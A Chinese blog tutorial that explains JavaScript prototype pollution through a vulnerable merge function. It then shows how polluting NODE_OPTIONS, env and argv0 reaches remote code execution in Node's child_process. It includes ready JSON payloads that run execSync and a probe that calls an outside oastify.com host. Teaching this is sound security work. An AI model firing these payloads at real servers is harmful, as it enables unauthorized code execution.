js原型链污染

最新推荐文章于 2024-10-11 17:39:47 发布
最新推荐文章于 2024-10-11 17:39:47 发布
阅读量905 收藏 14
点赞数 13
文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79700060/article/details/142703942
版权

js原型链污染

原理介绍

对于语句:object[a][b] = value 如果可以控制a、b、value的值,将a设置为__proto__,我们就可以给object对象的原型设置一个b属性,值为value。这样所有继承object对象原型的实例对象在本身不拥有b属性的情况下,都会拥有b属性,且值为value。

可以通过以下方式访问得到某一实例对象的原型对象:

objectname["__proto__"]
objectname.__proto__
objectname.constructor.prototype

demo

const foo = {
    bar: 1
};
// 如果这里将foo.__proto__改掉
foo.__proto__.bar = 2
console.log(foo.bar); // 这里正常输出 1
// 新声明一个
const zoo = {};
console.log(zoo.bar); // 这里错误输出 2

在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染。

攻击场景

其实我们主要看哪些场景会允许代码设置__proto__?主要有以下两种:

  • 对象merge
  • 对象clone
  • Node.js的construtor

一般的 merge 函数,merge操作是最常见可能控制键名的操作,也最能被原型链攻击。demo

function merge(target, source) {
    for (let key in source) {
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}

let object1 = {}
let object2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(object1, object2)
console.log(object1.a, object1.b)

object3 = {}
console.log(object3.b)

需要注意的点是:在JSON解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”,所以在遍历object2的时候会存在这个键。

这里就是循环遍历出 source 中的键名,然后判断键名是否在 source 和 target 中存在,如果都存在就再次执行 merge,不满足就给 target[key] 赋上 source[key] 的值,

第一次就是让 target 的 a 键赋值为 1,也就相当于给 object.a 赋值为 1。

然后第二次,键名就为 __proto__ 了,在 target 和 suorce 中都存在,再次执行 merge 函数

这时 key 为 b,就会给 target['b'] 赋值为 2。

怎么利用呢?参考: https://xz.aliyun.com/t/7184

Prototype Pollution to RCE

简单来说就是通过 js 的原型链污染进行 rce,

PP2RCE 通过 env 变量

__proto__
由于 node 的 child_process 库中的 normalizeSpawnArguments 函数的工作方式,当调用某些内容以便为进程设置新的 env 变量时,只需污染任何内容。例如,如果执行 __proto__.avar=“valuevar 操作,则进程将使用名为 avar 且值为 valuevar 的 var 生成。

但是,为了让 env 变量成为第一个变量,需要污染 .env 属性,并且(仅在某些方法中)该 var 将是第一个变量(允许攻击)。

这就是为什么在以下攻击中 NODE_OPTIONS 不在 .env 中的原因。

{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce\\\").toString())//"}}}
constructor.prototype
{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}}}

PP2RCE 通过 env + cmdline

  • 它不是将 nodejs 有效载荷存储在文件 /proc/self/environ 中,而是存储在 /proc/self/cmdlineargv0 中。

  • 然后,它不是通过 NODE_OPTIONS 要求文件 /proc/self/environ,而是 要求 /proc/self/cmdline

{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}

PP2RCE 漏洞 child_process 函数

当一个 进程被生成 使用 child_process 的某些方法(如 forkspawn 或其他)时,它调用方法 normalizeSpawnArguments,这是一个 原型污染工具,用于创建新的环境变量

具体每个函数利用参考:PP2RCE 漏洞 child_process 函数

DNS 验证

可以通过 dns 来判断是否存在漏洞

{
"__proto__": {"argv0":"node","shell":"node","NODE_OPTIONS":"--inspect=id.oastify.com"}
}
gaorenyusi
关注
JS原型链污染分析
m0_74344277的博客
08-07 145
由于_ .proto_ 是任何对象都有的属性 ,而js里万物皆对象,所以会形成一条_ .proto_连起来的链条 ,递归访问_ _proto_ 必须最终到头,并且值是null.当js引擎查找对象的属性时,先查找对象本身是否存在该属性,如果不存在,会在原型链上查找,但不会查找自身的prototype.这个特性被用来实现JavaScript中的继承机制Son.prototype = new Father()//这里Son.prototype意思是Son的父类,
JavaScript原型链污染
Elite的博客
09-02 802
JS原型链污染是指在JavaScript中由于原型链的特性,攻击者可以修改对象的原型,从而影响到所有该对象的实例,甚至全局范围内的对象。原型链污染可能导致代码执行漏洞和安全问题
JavaScript原型链污染攻击
BerL1n
07-18 7281
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
js原型链污染(超详细)
qq_51586883的博客
08-23 6274
js创建对象的三种方法 : 普通创建 var person={name:'lihuaiqiu','age','19'} ​ var person={} //创建空对象 构造函数方法创建 function person(){ this.name="liahuqiu"; this.test=function () { return 23333; ​ } } person.prototype.a=3; web=new person(); console.l...
JavaScript原型链污染原理及相关CVE漏洞剖析
白帽黑客八哥的博客
05-28 939
有些JavaScript库的函数支持根据指定的路径修改或定义对象的属性值。通常这些函数类似以下的形式:theFunction(object, path, value),将对象object的指定路径path上的属性值修改为value。如果攻击者可以控制路径path的值,那么将路径设置为_proto_.theValue,运行theFunction函数之后就有可能将theValue属性注入到object的原型中。
js原型链污染简单解析
qq_62886656的博客
03-30 230
通过一道题认识到这个漏洞。
解释器、预处理、main函数
编程语言技巧经验分享
10-07 1247
解释器覆盖范围很广,不管是解释语言的运行时解释翻译器,还是操作系统自带脚本的解释器。
javascript中==和===有什么不同
qq_48763502的博客
10-09 405
这个运算符用于比较两个值是否相等,但会在必要时进行类型转换。当两个值的类型不同,JavaScript 会尝试将它们转换为相同的类型,然后再进行比较。
Puppeteer自动化:使用JavaScript定制PDF下载
ip16yun的博客
10-08 841
Puppeteer 是一个强大的Node.js库,提供了对无头Chrome或Chromium的控制,可以用于生成网页快照、抓取数据、自动化测试等任务。其中,生成PDF文件是一个常见的需求,本文将通过使用Puppeteer展示如何自动化生成定制的PDF,并使用代理IP、设置user-agent、cookie等技术来增强自动化过程的灵活性与稳定性。为了更好地理解如何定制Puppeteer生成的PDF文件,我们提供一个生成A4纸张格式的网页PDF的实例。用户可以根据需求自定义输出的PDF格式或内容。
JavaScript】移动色块案例 实现一个可以拖动并且在拖动过程中会自动改变颜色的色块(JS 事件监听器)
最新发布
m0_66584716的博客
10-11 864
- **移动色块**:用户可以通过鼠标按住并拖动页面上的红色方块(`#blocks`)。当用户按下鼠标左键时,色块开始跟随鼠标的移动而移动;当用户释放鼠标左键时,色块停止移动。 - **显示当前位置**:随着色块的移动,其当前的屏幕坐标(相对于浏览器窗口)会被实时更新,并显示在页面底部左侧的位置显示区域(`#positionDisplay`)中。 - **自动变色**:一旦用户开始拖动色块,系统就会每隔300毫秒随机改变一次色块的颜色。颜色的变化是通过调用 `getRandomColor()` 函数生成一个
解决IE中a标签中的图片有边框
weixin_41674235的博客
10-08 184
‌1、通过CSS去除边框‌:在CSS中为img标签添加border:0 none;样式,例如:img{border:0 none;这种方法适用于大多数现代浏览器‌12。3‌、通过JavaScript去除点击后的虚线框‌:在a标签中添加outline:none;和text-decoration:none;这可以同时去除点击后的虚线框和下划线‌。
如何使用Python爬虫处理JavaScript动态加载的内容?
Z_suger7的博客
10-11 430
JavaScript动态加载的内容为爬虫带来了挑战,但也提供了新的机遇。通过使用Selenium、分析API请求或Pyppeteer,我们可以有效地爬取这些动态内容。这些方法各有优势,Selenium适合模拟复杂的用户交互,API请求适合直接获取数据,而Pyppeteer则提供了更强大的JavaScript控制能力。在实际应用中,开发者应根据目标网站的特点和需求选择合适的方法。随着技术的不断发展,我们也需要不断学习和适应新的工具和方法,以保持在数据获取领域的竞争力。复制再试一次分享。
vue2路由和vue3路由区别及原理
qq_25416827的博客
10-07 1412
Vue 3 的相较于 Vue 2 更加现代化和灵活,并且对 TypeScript 进行了更好的支持。与此同时,Vue 3 的路由实现基于 Composition API,使其能够更好地与 Vue 3 的设计理念相契合,提升了开发体验和可维护性。
案例-博客页面简单实现
Dingyuan0的博客
10-06 1683
文章目录本文内容只涉及前端1. 内容要求2. 画面展示初始化面演示视频3. 注意事项4. 代码区js文件夹下的jquery.min.js内容登录代码列表页面创作页面 本文内容只涉及前端 1. 内容要求 登录页面实现 博客列表页面实现 博客创作页面实现 链接: 开源在线 Markdown 编辑器 文本框可借助开源工具 2. 画面展示 初始化面 登录界面 博客列表页面 博客创作页面 演示视频 博客页面设计
天气预报echarts
weixin_47194802的博客
10-10 182
如上图,可以切换温度,降水量,风力风向和空气质量。
通过JS + PHP实现简易小说采集
shamqu的博客
10-07 736
1. 通过js来循环访问本地的php文件,并传输书本网址,编号等; 2. php获取小说站相应页面的内容,存入本地文件夹,并返回结果给js 3. js根据收到的结果来进行下一步处理,如果当前书本已经采集完,则采集下一本
【含开题报告+文档+PPT+源码】基于SSM框架的线上交易商城的设计与实现
码蜂窝编程-全网唯一毕设在线答疑,项目包运行成功,全套教学视频一站式辅导机构。
10-07 378
本课程演示的是一款校园二手交易系统,主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。包含:项目源码、项目文档、数据库脚本、软件工具等所有资料带你从零开始部署运行本套系统该项目附带的源码资料可作为毕设使用系统主要功能有:登录注册、公告管理、用户管理、商品管理、商品搜索、购物车、订单管理、用户私聊等模块。
nodejs原型链污染拿下靶标
09-12
Node.js原型链污染是一种攻击技术,通过污染对象的原型链来实现攻击目标。这种漏洞在出现属性赋值的时候比较容易出现,特别是在合并操作中。在CTF竞赛中,当JavaScript代码对某个变量的一个不存在的属性进行校验时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值